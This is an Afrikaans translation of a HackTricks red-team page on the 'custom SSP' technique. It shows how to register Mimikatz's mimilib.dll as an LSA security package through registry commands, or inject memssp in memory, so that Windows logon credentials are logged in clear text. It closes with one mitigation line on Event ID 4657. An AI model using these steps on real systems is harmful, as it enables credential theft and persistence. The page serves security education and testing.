2.6 KiB
Aangepaste SSP
Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy wil sien dat jou maatskappy geadverteer word in HackTricks of HackTricks aflaai in PDF-formaat Kyk na die INSKRYWINGSPLANNE!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek Die PEASS Familie, ons versameling van eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou haktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.
Aangepaste SSP
Leer wat 'n SSP (Sekuriteitsondersteuningsverskaffer) is hier.
Jy kan jou eie SSP skep om die gelogde in klarteks van die kredensiale wat gebruik word om toegang tot die masjien te verkry.
Mimilib
Jy kan die mimilib.dll
binêre lêer wat deur Mimikatz voorsien word, gebruik. Dit sal binne 'n lêer alle kredensiale in klarteks log.
Plaas die dll in C:\Windows\System32\
Kry 'n lys van bestaande LSA-sekuriteitspakette:
{% code title="aanvaller@teiken" %}
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
Voeg mimilib.dll
by die Lys van Sekuriteitsondersteuningsverskaffers (Security Packages) by:
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
En na 'n herlaai kan alle geloofsbriewe in die teks in C:\Windows\System32\kiwissp.log
gevind word.
In geheue
Jy kan dit ook direk in geheue inspuit met Mimikatz (let daarop dat dit effens onstabiel/nie werkend kan wees):
privilege::debug
misc::memssp
Dit sal nie oorleef nie herlaai.
Versagting
Gebeurtenis ID 4657 - Oudit skepping/verandering van HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages